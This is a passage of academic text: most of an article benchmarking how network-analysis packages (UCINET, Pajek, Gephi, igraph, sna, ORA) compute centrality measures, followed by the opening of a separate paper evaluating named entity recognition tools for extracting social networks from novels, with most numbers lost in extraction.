two-mode ( , ) na ( , ) . connections benchmarking and reliability issues | volume | issues & | insna.org table : consistency of output by centrality type and network conditions high = completely consistent, medium = one or two programs vary from the others, low = more than two programs offer unique results closeness centrality closeness centrality measures showed the least amount of measurement variability in ideal networks (i.e., no loops or discon- nected components), or in networks con- taining loops, but not in disconnected components. in networks containing no loops or disconnected components, plots indicated that calculations of closeness centrality were consistent between pajek, sna, igraph, ora, and ucinet; but only when ucinet was calculated using freeman ( ) normalization. ucinet and gephi also correspond when closeness measures in ucinet are report- ed as summed or averaged distances. in this condition, both ucinet and gephi produce output for freeman closeness with smaller values indicating shorter average distances from a particular node to all oth- ers in the graph (see negative correlation coefficients [small graph r = - . , large graph r = . ]). ucinet also offers an “average reciprocal distance” measure (ard) that corresponds more closely with other programs (small graph r = . , large graph r = . ). no disconnected components & no loops disconnected components loops disconnected components & loops mode mode mode mode mode mode mode mode between- ness cen- trality high high high high high na high na degree centrality high medi- um high medi- um low na low na eigenvec- tor cen- trality medium medi- um medi- um low medium na low na closeness centrality medium medi- um low low medium na low na benchmarking and reliability issues connections insna.org | issues & | volume | figure : scatterplot matrix comparing closeness centrality output for a large, two-mode network. pearson’s correlation coefficients between programs are provided above the diagonal. in two-mode networks, neither ucinet, nor gephi produced results that corresponded with other programs (figure ). ucinet, the only one of these pro- grams to include a closeness measure de- signed explicitly for use with two-mode data, produced a bifurcated plot in both large and small two-mode networks, though the effect is more pronounced in the larger networks (pictured, figure ). while the numeric values are different than those seen in degree centrality, the split- line pattern was similar to that observed in two-mode data without loops, but with dis- connected components included, and is at- tributable to ucinet’s distinctive treat- ment of two-mode output. networks that contain disconnected components, but no loops, resulted in the greatest disparities in closeness centrality measurements. although all software test- ed cited freeman as the reference for their centrality measure, only sna seemed to closely implement freeman’s ( ) ap- proach, and therefore produced no centrali- ty values when disconnected components were included in the graph, as expected under freeman’s approach. all other tested software generated closeness centrality values, as did sna when disconnected com- ponents were not present. although uci- net (as of version . ) no longer pro- vides a warning to the user that analyzing a disconnected graph with freeman’s close- connections benchmarking and reliability issues | volume | issues & | insna.org ness centrality measure is technically inap- propriate, it does require the user to select between options for handling the unde- fined distances offered by disconnected components. of the software that produced output under these conditions, values were disparate and only igraph and ora were consistent with one another. (figure ) in considering networks with both loops and disconnected components, there was a similar disparity of closeness cen- trality measures as seen in graphs with no loops, but with disconnected components. the same pairs of consistent and incon- sistent software values as seen in the graphs with disconnected components were observed with loops added to the data. figure : scatterplot matrix comparing output for closeness centrality in a small, one-mode network. pearson’s correlation coefficients between programs are provided above the diagonal. note that the sna package for r does not produce measures between disconnected components, resulting in correla- tion values listed as “na”. benchmarking and reliability issues connections insna.org | issues & | volume | degree centrality in networks with no loops, degree centrali- ty was consistent across software in one- mode networks, with the exception of ucinet. a similar pattern was observed for two-mode networks. for these two- mode data, ucinet values fell into two distinct groups in the plots contrasting ucinet with other software. the data are positively correlated, but some stratifica- tion is present. this pattern was similar for both large and small two-mode networks, though the effect is more pronounced in the larger networks (figure ). ucinet normalizes output for nodes in each mode individually, an aspect that differentiates it from other tested programs when handling two-mode data. such differences between ucinet and other programs are eliminat- ed if the network is converted to bipartite, to be analyzed as a one-mode network. the measurement of degree centrality was con- sistent among all programs in networks that contained disconnected components with no loops. figure : a variety of solutions are possible when analyzing two-mode networks in ucinet. top row: scatterplots of ucinet’s degree (r = . ) and closeness (r = - . ) output using the two- mode centrality procedure, compared with other analytic packages. all other packages performed identically. bottom row: when transformed into a bipartite network format, ucinet calculates as for a one-mode network, and results are analogous to other packages. closeness centrality for the bipartite aspect was calculated using freeman normalization in ucinet. connections benchmarking and reliability issues | volume | issues & | insna.org one-mode networks containing loops generated the greatest variability in measures of degree centrality across soft- ware (figure ). for both small and large networks with loops, calculations of degree that are made without modification of the data structure were consistent only be- tween ucinet and ora, between igraph and pajek, and between sna and gephi (see figure for an example in a small net- work). in networks with both loops and disconnected components, the patterns were essentially the same as those ob- served for one-mode networks with loops only. no other new patterns were apparent. the variations in output stem from how each program handles loops. program defaults counted single loops as two edges (pajek and igraph), loops as one edge (ucinet and ora), or ignored loops en- tirely under the default commands (gephi and sna). note that the two r packages (sna and igraph) differ in their default treatment of loops, with igraph defaulting to include loops and sna defaulting to ig- nore them in calculations. when the sna package was modified to include loops (di- ag = true) in the calculation of degree centrality, sna counted all loops as one edge and the output was consistent with that of ucinet and ora. gephi counted all loops as two arcs in a manner that was consistent with pajek and igraph. figure : scatterplot matrix comparing degree centrality output for a small, one-mode network con- taining loops. pearson’s correlation coefficients between programs are provided above the diagonal. benchmarking and reliability issues connections insna.org | issues & | volume | eigenvector centrality eigenvector centrality was inconsistent across software packages and network types. in networks with no loops or dis- connected components, eigenvector cen- trality measures were inconsistent between gephi and other programs in moderately large, but not small one-mode networks. changing the default number of iterations in gephi’s eigenvector centrality measure from to , , greatly improved the consistency of measures between pro- grams; however, a small disparity remains for one-mode networks (r = . ). in two-mode networks, igraph, ora, gephi, and pajek’s “ -mode im- portant vertices” function produced results that were largely consistent with uci- net’s two-mode eigenvector centrality (figure ). pajek’s “hubs and authorities” measure (designed for one-mode networks) and sna produced results that are consistent with one another (not shown). in large two-mode networks, however, the output from gephi was again characterized by some small disparities (figure ). figure : scatterplot matrix comparing eigenvector centrality output for a large, two-mode network. pearson’s correlation coefficients between programs are provided above the diagonal. pajek output for this plot was calculated using “important vertices”, a two-mode generalization of hubs and authorities. connections benchmarking and reliability issues | volume | issues & | insna.org networks containing loops, but lacking disconnected components resulted in additional variability in measures of ei- genvector centrality across software. as observed for degree centrality, the correla- tion between programs’ centrality values was high; however, a separate set of points forming a group off of the diagonal ap- peared. eigenvector centralities calculated in large, one-mode networks resulted in correspondence between ucinet, ora, igraph, and the “hubs and authorities” measure in pajek. the result was similar in small one-mode networks. a correspond- ence between sna (which defaults to ignor- ing loops) and gephi is also noted (figure ). the sna “evcent” function offers two additional options for calculating eigenvec- tor centrality. the sna evcent function with included loops (diag=true argument) yielded eigenvector scores correlated (r = . ) with all other software except for gephi results. however, when combining presence of loops with the more robust calculation of eigenvector centrality (di- ag=true, use.eigen=true) specified in the user manual, the outputted eigenvector is inversely correlated (sna : other packag- es, r = - . ; sna : gephi, r = - . ). the variability in eigenvector centrality scores was noted in large and small networks, but more pronounced in the former. figure : scatterplot matrix of eigenvector centrality output for a small, one-mode network with loops. pearson’s correlation coefficients between programs are provided above the diagonal. note, initial cal- culations in sna – shown above – were run using the default argument (diag=false). for additional variation, consult the text above. benchmarking and reliability issues connections insna.org | issues & | volume | the igraph package produced eigenvector output that differed slightly from other programs in networks that contain discon- nected components, but no loops (small networks r = . ). the disparity was much less pronounced in large networks (r = . ). the above patterns of inconsisten- cies in calculating eigenvector centrality persisted in networks with both loops and disconnected components. in small net- works of this type, pajek, ucinet, and ora produced measures that were con- sistent with one another. similarly, sna and gephi also produced nearly identical out- put in small networks with both loops and disconnected components. in larger net- works, however, the similarities between sna and gephi diminished. only pajek, ucinet, and ora were highly consistent (see figure ). figure : scatterplot matrix comparing eigenvector centrality output for a moderately large, one-mode network containing loops and disconnected components. pearson’s correlation coefficients between programs are provided above the diagonal. betweenness centrality measurement of betweenness centrality was virtually unaffected by the various network conditions being evaluated (i.e., loops, disconnected components). measures were consistent for each of the tested packages, on every dataset (see fig- ure for an example). the one, very slight, exception was in ucinet’s two- mode measures. ucinet differed slightly from other programs in measuring be- tweenness in the small two-mode network connections benchmarking and reliability issues | volume | issues & | insna.org (r = . , accompanied by slight jitter in scatterplots – not shown). however, no dif- ferences were apparent if the same network was converted to bipartite and the one- mode variation of the betweenness meas- ure was used instead. for more examples of the differences between ucinet’s two- mode measures and other programs’ ap- proaches to two-mode networks, see fig- ure . figure : scatterplot matrix comparing betweenness centrality output for a large, one-mode network. pearson’s correlation coefficients between programs are provided above the diagonal. benchmarking and reliability issues connections insna.org | issues & | volume | discussion this study was designed to examine basic reliability concerns among a selection of popular tools in use within the social net- work analysis community. specifically, we investigated whether some popular soft- ware packages were producing equivalent results. we found variability that brings to light disagreement, sometimes substantial, over how four concepts of node centrality should be measured. the programs under consideration were only able to produce the same output under a very narrow set of conditions. disagreements over aspects of how these measures should be operational- ized manifested as networks departed from the ideal reference graphs that contained no loops or disconnected components. such variability precludes the ability to seamlessly port data and/or exchange measures between programs and makes it essential for the user to have access to evaluations that highlight differences be- tween the default, and available, options for various measures when using two or more programs in concert. within the so- cial network analysis community, the dif- fering assumptions behind the various measurement variations unnecessarily cloud communication between users of dif- ferent programs and leave enough doubt in the minds of new entrants as to whether the community has unified its language. be- low, we discuss in greater detail our inter- pretation of the results, the implications of our findings for the average user, and the implications for the social network analy- sis community. general findings by employing hierarchical subsets of net- work conditions, we isolated measure dif- ferences under specific conditions. the use of varying network conditions was intend- ed to better reflect a range of network data that are likely to be encountered. condi- tions in the undirected networks ranged from the “ideal” of reference data – no loops or disconnected components – to scenarios commonly encountered when analyzing social networks, namely, loops, disconnected components, and the combi- nation of the two. in general, centrality measures for reference graphs – those with no loops or disconnected components – were largely consistent. this may be taken to imply that programs are implementing the same – or very similar – algorithms for the offered measures, albeit mainly in the absence of issues that may complicate calculation, such as loops and disconnected compo- nents. a notable inconsistency did, how- ever, arise in the analysis of the two-mode reference networks. of the tested software, only ucinet offered measures tailored specifically for two-mode networks. cor- respondingly, analytic results reveal a bi- furcated pattern when comparing calcula- tions of degree and closeness in ucinet to those of other software packages, along with slight differences in betweenness measures in small two-mode networks. no other programs demonstrated a pattern that corresponded to that of ucinet when measuring degree, closeness, or between- ness. when measuring eigenvector central- ity, however, three additional programs (igraph, ora, and gephi) evince a bifur- cated pattern that corresponds very closely with ucinet. (figure ) connections benchmarking and reliability issues | volume | issues & | insna.org figure : scatterplot matrices comparing degree and eigenvector output for a two-mode network. nei- ther network contains loops or disconnected components. pearson’s correlation coefficients between programs are provided above the diagonal. there was a surprising amount of inconsistency in the most basic measure: degree centrality. programs’ definitions identified degree centrality as either the number of neighbors adjacent to a node, or the number of edges incident upon a node. however, many programs did not provide a citation for this measure. among those that do, the freeman ( ) definition is employed, which does not account for a topological feature that is common in bio- logical, corporate, citation, and other net- works: self-referencing, or loops. freeman implements a variation on nieminen ( ), which accounts for the number or proportion of other nodes that are adjacent to a particular node, but not for nodes that are adjacent to themselves (i.e., loops). the evaluated programs defaulted to three dif- ferent methods for dealing with loops in a graph, revealing the variation in degree centrality calculations. this disparity be- tween definitions of what constitutes a loop and how its effect should be measured in such a conceptually simple calculation suggests the need for the community of social network analysts to strengthen naming and meas- urement standards. such a process may re- duce error in interpretations resulting from what are actually different measures resid- ing under the same name. the problem of different measures residing under the same name is exempli- fied when considering eigenvector central- ity. although most programs identify this measure as eigenvector centrality, the presence of loops in a network reveals slight differences in how this measure is operationalized. in its essence, eigenvector centrality extends degree centrality by weighting each node’s score by its neigh- bors’ scores (bonacich ). like degree, it is affected by loops. five of the tested programs cite bonacich ( , or ) in calculations of this measure, and one – pa- jek – employs the analogous “hubs and au- thorities” (kleinberg ). as with de- gree centrality, the presence of loops in a network reveals which programs opera- tionalized this measure using the same or substantially similar assumptions. benchmarking and reliability issues connections insna.org | issues & | volume | three programs – ucinet, ora, and pa- jek – were consistent with one another in measuring eigenvector centrality in all three variations of one-mode networks. this is notable because one of those three, pajek, provides “hubs and authorities”, which generates two independently scaled measurement vectors, of which the authori- ties vector was consistent with eigenvector centrality in the other two programs. this is the one case where a centrality meas- urement that differed from the classic cita- tion was identified under a different name. perhaps the most conspicuous case of inconsistent calculations is closeness centrality in the presence of disconnected components. all programs evaluated refer- enced freeman’s ( ) measure, with the exception of pajek, which cites sabidussi ( ), as cited in freeman. however, it quickly becomes apparent that the question of how to operationalize closeness centrali- ty is neither agreed upon, nor settled in consideration of disconnected components. the original formula for closeness centrali- ty should not function with disconnected data since the distance between discon- nected components is undefined (freeman ). any means of dealing with discon- nected data, with the possible exception of running calculations only within each indi- vidual component, is therefore a later vari- ation of the freeman formulation. isolates and other disconnected components – which can be common network features in some areas – frequently present an obstacle to communicating the results of this meas- ure. a wide array of alternate measures has since been proposed to allow calculation of closeness with disconnected data (e.g., borgatti , dangalchev , opsahl , wei et al ). amid such prolifer- ation, however, it is unclear which forms have been incorporated in the software yielding results for disconnected compo- nent datasets. only the r package sna produced an error message without numerical results rather than closeness values as stipulated in freeman ( ), because it treats the dis- tances between disconnected components as infinite. there is also a stern admonish- ment in the package details against calcu- lating closeness centrality in networks with disconnected components. all other soft- ware produced closeness calculations without requiring that smaller components first be removed. the analysis of disconnected net- works using closeness produced widely varied output. correspondingly, all tested software provided some means for dealing with disconnected components. in most software, the method for defining the dis- tance between disconnected components was incorporated into the measure. ora and the r package igraph appear to default to substituting the number of nodes for un- defined distances, whereas gephi appears to report undefined distances as zero and omit disconnected nodes from calculation. pajek sets undefined distances to zero and calculates closeness only within each com- ponent. of the software tested, ucinet of- fers the most options for applying close- ness centrality to one-mode networks with disconnected components. the user may choose one of four options for dealing with the distances between disconnected com- ponents: ( ) substitute the number of nodes in the graph for the undefined distance; ( ) substitute the maximum distance, plus one (the default setting); ( ) treat undefined distances as missing and assign no value to isolates; and ( ) set undefined distances to zero and calculate closeness only within each component. those four options, com- bined with three options for scaling output (summed distances, averaged distances, and freeman normalization) present the user with combinations of options for calculating closeness in cases with discon- nected components. aside from differences in how out- put was scaled, there was essentially no variation in calculating betweenness cen- trality. this is perhaps unsurprising, as there is little room for interpretation in the definition of this measure. betweenness, a the option of treating undefined distances as missing is scaled in only one manner. connections benchmarking and reliability issues | volume | issues & | insna.org normalized count of the number of times that a node appears on the shortest path be- tween any two other nodes (freeman ), will generally be unaffected by dis- connected components and loops since loops will not create new geodesics (short- est paths) and the absence of paths be- tween disconnected components does not complicate geodesic counts. it bears repeating that the programs tested displayed relatively little variation when analyzing reference graphs – those with neither loops, nor disconnected com- ponents. the variation that was present in the centrality output from the reference graphs appears more likely to have arisen from differences in opinion on preferred methods of calculation in situations that vary from the ideal of connected one-mode graphs with non-recursive edges. implications for the field user the reference graphs make it clear that – with only a few exceptions – those respon- sible for developing and maintaining each of these programs have done an admirable job of benchmarking their programs against others and correcting unintentional software differences. however, network topology that diverges away from the “ide- al” reference graph reveals that there is a great deal of disparity in the analytic as- sumptions that are built into software used to calculate such measures. the problem that arises from this lack of understanding and agreement within the social network analysis community is that it puts both analysts and the field itself at a disad- vantage by introducing unnecessary noise into analyses and communication within the community. certainly, for those analysts whose data are similar to our reference graphs (i.e., no loops, no isolates or other discon- nected components) the low variability in measurement definition and implementa- tion is good news. the lack of variation in the output for the four reference graphs in- dicates that the programs used in this study agree in their standards for the calculation of basic centrality measures under the most basic and favorable conditions. the differ- ences that resulted from other conditions, however, underscore the importance of an analyst’s familiarity with their choice of software, and the software used by those whose work they wish to use as an analytic benchmark. a good deal of care should be exercised to verify the precise method of calculation being applied and the settings – and defaults – that were employed for those calculations. centrality measures typically form the foundation of an analysis and if their implementation varies, more complex al- gorithms that involve one or more of these centrality measures may be producing measures or results that magnify this vari- ability. unfortunately, the variation in the measurement of centrality values between programs remains somewhat opaque. measurement disparities were observed even when the terms and citations used to identify the measures were identical be- tween programs. clearly, analyzing the same net- work in the same way, using different software, can produce divergent results. if the implementation of a given centrality measure differs from one program to an- other, they are at best two different variants of the same measure. if such is the case, it will aid the analyst to know which variant they are utilizing. with its variety of measures and selections, ucinet goes the furthest of all the software tested above in identifying which variant of a particular measure it is employing – naming particu- lar variants of the same measure according to its originator or an intuitive description of its function. only a few of the tested an- alytic tools were consistently explicit about the equations used to produce all four measures. the clarity in communication that has characterized the development of methods in the field of social network analysis is less evident in software opera- tionalization. this presents a threat to the validity of how those measures are em- ployed. definitional differences between programs exist and are not readily apparent benchmarking and reliability issues connections insna.org | issues & | volume | to the average user. although variations in centrality calculations hold the potential to increase the validity of a particular meas- ure when applied in the appropriate con- text, such differences are frequently masked from the general user, resulting in increased potential for the misapplication of measures. the present research has highlight- ed the value of knowing what one is get- ting into when considering new analytic software, and the importance of thoroughly vetting the topology of the network being analyzed. add to that the tendency for most software packages to have some pro- vision for porting data and/or measures be- tween packages. the detected disparity in measures available in the current analytic packages indicates that such practices should be undertaken with caution – espe- cially in cases where graphs contain loops, isolates, or disconnected components. if the basic measures differ between packag- es then it may be inadvisable to use the two packages together in an analysis that involves those measures. implications for the social network analy- sis community the lack of consensus over how to opera- tionalize the most common node centrality measures suggests some ontological varia- bility within the social network analysis community. disagreements over how vari- ous centrality measures should be opera- tionalized would not be troubling if they were apparent to the user. but the differ- ences highlighted above are far from clear to the average user. lack of agreement over how to operationalize a measure is masked when a variety of approaches share a single name. the situation is exacerbated when software documentation does not clarify precisely which approach has been implemented. the debate over how various net- work measures should be calculated is rich, and as old as the field itself. the community’s openness to new variations on established methods provides flexibility and a healthy diversity of analytic options. however, the advantages of such wealth are substantially diminished when the same measure is operationalized different- ly in each analytic package. although a shared lexicon of terms and concepts exists within the social network analysis commu- nity, those terms and concepts are only generally – and not explicitly – applied. the programs used to perform social net- work analysis are disparate enough to cre- ate idiosyncratic analytic results. the interfaces of each analytic package vary greatly and do not always de- fault to the most commonly used variants of each measure. without equivalence of measurement assumptions and nomencla- ture between programs that is easily acces- sible, the assumption of equivalence and portability of centrality measures in net- work analysis is lacking. this increased variability of centrality results may poten- tially affect more complex algorithms that incorporate these basic measures. these basic differences could be resolved with agreed-upon defaults and naming conven- tions for variants of a particular measure or algorithm. it is important that the variants of each measure be identified as distinct vari- ations of a centrality – or other measure- ment – theme. it is not enough to identify a measure generally as “closeness centrality” if it varies from the basic measure identi- fied by freeman (or sabidussi) – which most all do. instead, the measure should be explicitly identified as a particular variant in order to better emphasize its unique at- tributes and trade-offs. explicit descriptions of measurements can be essential to proper analysis. to draw an example from another analytic field: post-hoc tests for pairwise compari- sons of means following analysis of vari- ance have been developed to address varia- tions in hypothesis testing, trade-offs be- tween power and error, unequal sample sizes, and unequal variances (for a discus- sion of post-hoc tests see kirk ). although the more casual user may find such a selection daunting, the strength in connections benchmarking and reliability issues | volume | issues & | insna.org this diversity of options is that the user may better consider and tailor their analyt- ic selections. additionally – and perhaps more importantly – small differences be- tween variations on a measure become a feature, rather than an obstacle, when a particular form of a measurement is explic- itly named. naming conventions are important. if a measure or algorithm differs from oth- ers in order to address some given scenario or feature of network topology, then it bears unique attributes that more often than not constitute a trade-off at some level. it is far better for both the analyst and the community for these differences to become less opaque. of the tested programs, uci- net appears to have gone the furthest in giving attribution to the different variants of each measure. though, both r packages benefit from the explicit nature of specify- ing a measurement. this aids the analyst by further clarifying differences between analytic approaches. the community is aided in establishing reliability of meas- urements between programs; as such clari- ty makes it much easier to directly com- pare results from different programs. it is not necessary for each program to offer every available option – though several have clearly taken steps in that di- rection. it is likely to be much more help- ful to the social network analysis commu- nity at large if the measures and algorithms that a program offers are fully identified for appropriate application of their proper- ties. proper identification will simplify dis- course and improve the communication of methods. such improvements in communi- cation within the field also translate into increases in measurement validity when a measure is identified as a specific variant, rather than just belonging to a general cat- egory or class of measures. lastly, it should be noted that a lack of agreement from within the commu- nity on something as fundamental as nam- ing conventions hints at an arbitrariness that is surprising given the care and rigor of those who have established and expand- ed the field of social network analysis. freeman ( , ) has repeatedly made a compelling case for clarity and precision in communication – as facilitated by math- ematical notation – being the factor that set social network analysis apart from similar fields that rely more on natural language for clarification. the benefits of such pre- cision are, however, often frustratingly be- yond the reach of those using social net- work analysis software. further, as researchers from other fields continue to adapt and adopt social network analytic methods, the use of standard, specific terms on the available analytic options provides a clarity that aids newcomers to social network analysis in seeing how their field can benefit by adopting a network analytic approach. but the converse is not the case: imprecise def- initions need not constitute an invitation for some within the “hard sciences” to forego established network analysis meth- ods in favor of feigning to invent them for themselves. although co-option will likely continue, there has been an increase in the number of new entrants to social network analysis who give proper attribution (freeman ). clarity of communication will reinforce social network analysis as a mature and growing field, and de- emphasize the perception of it as being a general perspective or a mere category of tools (knoke and yang , snowden ). in most cases, it is possible to force the centrality output for a network contain- ing loops or disconnected components to be relatively consistent across all six plat- forms employed above. but such actions frequently require transformations or other preprocessing in order to do so, and those steps are seldom stipulated since there is no real agreed-upon definition of exactly which mathematical approach constitutes each type of centrality. the clarity that comes with definitional consistency be- tween programs is what we feel to be needed. we advocate the clarity that comes with dissimilar means to a particular end being clearly identified up front. benchmarking and reliability issues connections insna.org | issues & | volume | the “correct” measure is the one that is best suited to handle the idiosyncra- sies of the data an analyst holds. for the analyst to make this assessment, they first need to know the topology of the network they are analyzing; and next, specifically how a measure is meant to operate, and its underlying assumptions. a more complete approach includes asking which variation of the measure is available, the strengths and limitations of that version, and how re- liably one or more programs produce accu- rate measures. we have identified program and inter-program reliability issues under varied conditions. similar comparisons be- tween other programs and under different conditions are strongly recommended when weighing whether to use two or more analytic programs in conjunction with one another. further evaluations of inter- program reliability will benefit from add- ing more types of variation: e.g., directed graphs, density variations, clusterability variations. ongoing research in this topic will continue to be important as new en- trants continue to discover the scalability and utility of the tools and concepts of so- cial network analysis for deciphering in- creasingly diverse networks with complex topological features. references anderson, e., bai, z., bischof, c., blackford, s., demmel, j., dongarra, j., du croz, j., greenbaum, a., hammarling, s., mckenney, a., sorensen, d. ( ). lapack users' guide. ( rd ed.). phila- delphia, pa: siam. batagelj, v., mrvar, a. ( ). pajek – analysis and visualization of large networks. university of ljubljana, slovenia, eu. available at: http://pajek.imfm.si/doku.php?id=download bastian, m., heymann s., jacomy, m. ( ). gephi: an open source software for exploring and manipu- lating networks. international aaai conference on weblogs and social media. available at: https://gephi.org. becker, r.a., chambers, j.m., wilks, a.r., ( ). the new s language. pacific grove, ca: brooks/cole. bonacich, p. ( ). factoring and weighting ap- proaches to status scores and clique identification. journal of mathematical sociology, , – . bonacich, p. ( ). power and centrality: a family of measures. american journal of sociology, , – . borgatti, s.p., everett, m.g., freeman, l.c. ( ). ucinet for windows: software for social network analysis. analytic technologies, harvard, ma. available at: http://www.analytictech.com/ucinet.htm borgatti, s.p. ( ). identifying sets of key players in a network. computational, mathematical and or- ganizational theory, , – . butts, c.t. ( ). sna: tools for social network analysis. version . . irvine, ca. available at: http://erzuli.ss.uci.edu/r.stuff carley, k., reminga, j. ( ). ora: organization risk analyzer*. center for analysis of social and organizational systems, carnegie mellon univer- sity. pittsburgh, pa. available at: http://www.casos.cs.cmu.edu/projects/ora csardi, g., nepusz, t. ( ). the igraph software package for complex network research. interjour- nal, cambridge, ma, . available at: http://igraph.sourceforge.net. doreian, p. ( ). causality in social network analy- sis. sociological methods research, ( ), – . dangalchev c. ( ). residual closeness in net- works. physica, : , – . freeman, l.c. ( ). a set of measures of centrality based on betweenness. sociometry, : – . freeman l.c. ( ). centrality in social networks: conceptual clarification. social networks, : – . freeman, l.c. ( ). turning a profit from mathe- matics: the case of social networks. journal of mathematical sociology, : – . freeman, l.c. ( ). the development of social network analysis: a study in the sociology of sci- ence. north charleston, sc: booksurge. freeman, l.c. ( ). the development of social network analysis: with an emphasis on recent events, in sage handbook of social network analysis. john scott and peter carrington, eds. thousand oaks, ca: sage, – . kirk, r.e. ( ). experimental design: procedures for the behavioral sciences. ( rd ed.) pacific grove, ca: brooks/cole. kleinberg, j. . "authoritative sources in a hyper- linked environment." journal of the acm ( ): - . knoke, d., yang, s. ( ). social network analysis. ( nd ed.) los angeles, ca: sage. nieminen, j. ( ). on centrality in a graph. social science research, : – . opsahl, t. ( , march ). closeness centrality in networks with disconnected components. in: tore opsahl. retrieved november , , from http://toreopsahl.com/ / / /closeness- centrality-in-networks-with-disconnected- components/ connections benchmarking and reliability issues | volume | issues & | insna.org otte, e, rousseau, r. ( ). social network analysis: a powerful strategy, also for the information sci- ences. journal of information science, , – . reminga, j., carley, k. ( ). measures for ora (organization risk analyzer*). casos working papers. retrieved november , , from http://www.casos.cs.cmu.edu/publications/papers/r eminga_ _ora.pdf sabidussi, g. ( ). the centrality index of a graph. psychometrika, , – . smith, b.t., boyle, j.m., dongarra, j.j., garbow, b.s., ikebe,y., klema, v., moler, c.b. ( ). matrix eigensystems routines – eispack guide. springer-verlag lecture notes in computer sci- ence, . snowden, d. ( ). from atomism to networks in social systems. the learning organization, ( ), – . stokman, f.n., doreian, p. ( ). evolution of social networks: processes and principles, patrick doreian and frans n. stokman, eds. evolution of social networks. amsterdam: gordon and breach publishers, – . valente, t.w., coronges, k., lakon, c., costenbader, e. ( ). how correlated are network centrality measures? connections, ( ), – . wei, w., pfeffer, j., reminga, j., carley, k. ( ). handling weighted, asymmetric, self-looped and disconnected networks. casos technical report: cmu-isr- - . retrieved november , , from http://www.casos.cs.cmu.edu/publications/papers/ cmu-isr- - .pdf wikipedia ( ). eigenvector centrality. in: central- ity. retrieved november , , from http://en.wikipedia.org/wiki/betweenness#eigenve ctor_centrality. wilkinson, j.h. ( ). the algebraic eigenvalue problem. new york, ny: oxford university press. evaluating named entity recognition tools for extracting social networks from novels evaluating named entity recognition tools for extracting social networks from novels niels dekker , tobias kuhn and marieke van erp department of computer science, vrije universiteit amsterdam, amsterdam, the netherlands dhlab, knaw humanities cluster, amsterdam, the netherlands abstract the analysis of literary works has experienced a surge in computer-assisted processing. to obtain insights into the community structures and social interactions portrayed in novels, the creation of social networks from novels has gained popularity. many methods rely on identifying named entities and relations for the construction of these networks, but many of these tools are not specifically created for the literary domain. furthermore, many of the studies on information extraction from literature typically focus on th and early th century source material. because of this, it is unclear if these techniques are as suitable to modern-day literature as they are to those older novels. we present a study in which we evaluate natural language processing tools for the automatic extraction of social networks from novels as well as their network structure. we find that there are no significant differences between old and modern novels but that both are subject to a large amount of variance. furthermore, we identify several issues that complicate named entity recognition in our set of novels and we present methods to remedy these. we see this work as a step in creating more culturally-aware ai systems. subjects computational linguistics, digital libraries, network science and online social networks keywords social networks, named entity recognition, evaluation, digital humanities, classic and modern literature, cultural ai introduction the characters and their relations can be seen as the backbone of any story, and explicitly creating and analysing a network from these relationships can provide insights into the community structures and social interactions portrayed in novels (moretti, ). quantitative approaches to social network analysis to examine the overall structure of these social ties, are borrowed from modern sociology and have found their way into many other research fields such as computer science, history, and literary studies (scott, ). elson, dames & mckeown ( ), lee & yeung ( ), agarwal, kotalwar & rambow ( ), and ardanuy & sporleder ( ) have all proposed methods for automatic social network extraction from literary sources. the most commonly used approach for extracting such networks, is to first identify characters in the novel through named entity recognition (ner) and then identifying relationships between the characters through for example measuring how often two or more characters are mentioned in the same sentence or paragraph. many studies use off-the-shelf named entity recognisers, which are not necessarily optimised for the literary domain and do not take into account the surrounding cultural how to cite this article dekker n, kuhn t, van erp m. . evaluating named entity recognition tools for extracting social networks from novels. peerj comput. sci. :e doi . /peerj-cs. submitted october accepted april published april corresponding author marieke van erp, marieke.van.erp@dh.huc.knaw.nl academic editor diego amancio additional information and declarations can be found on page doi . /peerj-cs. copyright dekker et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:marieke.�van.�erp@�dh.�huc.�knaw.�nl https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ context. furthermore, to the best of our knowledge, such studies focus on social network extraction from th and early th century novels (which we refer to as classic novels). typically, these classic novels are obtained from project gutenberg (http://gutenberg.org/), where such public domain books are available for free. while beneficial for the accessibility and reproducibility of the studies in question, more recent novels may not imitate these classic novels with respect to structure or style. it is therefore possible that classic novels have social networks that have a structure that is very different from more recent literature. they might differ, for example, in their overall number of characters, in the typical number of social ties any given character has, in the presence or absence of densely connected clusters, or in how closely connected any two characters are on average. moreover, changes along dimensions such as writing style, vocabulary, and sentence length could prove to be either beneficial or detrimental to the performance of natural language processing techniques. this may lead to different results even if the actual network structures remained the same. vala et al. ( ) did compare th and th century novels on the number of characters that appear in the story, but found no significant difference between the two. furthermore, an exploration of extracted networks can also be used to assess the quality of the extracted information and investigate the structure of the expression of social ties in a novel. thus far, we have not found any studies that explore how ner tools perform on a diverse corpus of fiction literature. in this study, we evaluate four different tools on a set of classic novels which have been used for network extraction and analyses in prior work, as well as more recent fiction literature (henceforth referred to as modern novels). we need such an evaluation to assess the robustness of these tools to variation in language over time (biber & finegan, ) and across literary genres. comparing social networks extracted from corpora consisting of classic and modern novels may give us some insights into what characteristics of literary text may aid or hinder automatic social network extraction and provide indications of cultural change. as previous work (ardanuy & sporleder, ) has included works from different genres, in this work we decided to focus on the fantasy/science fiction domain to smooth potential genre differences in our modern books. in our evaluation, we devote extra attention to the comparison between classic and modern fantasy/science fiction in our corpus. we define the following research questions: � to what extent are off-the-shelf ner tools suitable for identifying fictional characters in novels? � which differences or similarities can be discovered between social networks extracted for different novels? to answer our first research question, we first evaluate four named entity recognisers on classic and modern fantasy/science fiction novels. in each of these novels, the first chapter is manually annotated with named entities and coreference relations. the named entity recognisers we evaluate are: ( ) booknlp (bamman, underwood & smith, ; we follow (sainte-beuve, ) here in defining a classic novel not as one written by the ancient greeks or romans (‘the classics’) but to canonical works. dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://gutenberg.org/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ https://github.com/dbamman/book-nlp—commit: d a ) which is specifically tailored to identify and cluster literary characters, and has been used to extract entities from a corpus of , english novels. at the time of writing, this tool was cited times. ( ) stanford ner version . . (finkel, grenager & manning, ), one of the most popular named entity recognisers in the nlp research community, cited , times at the time of writing. ( ) illinois named entity tagger version . . (ratinov & roth, ), a computationally efficient tagger that uses a combination of machine learning, gazetteers, and additional features extracted from unlabelled data. at the time of writing, the system was downloaded over , times. our last system ( ) is ixa-pipe-nerc version . . (agerri & rigau, ), a competitive classifier that employs unlabelled data via clustering and gazetteers that outperformed other state-of-the-art ner tools on their within and out-domain 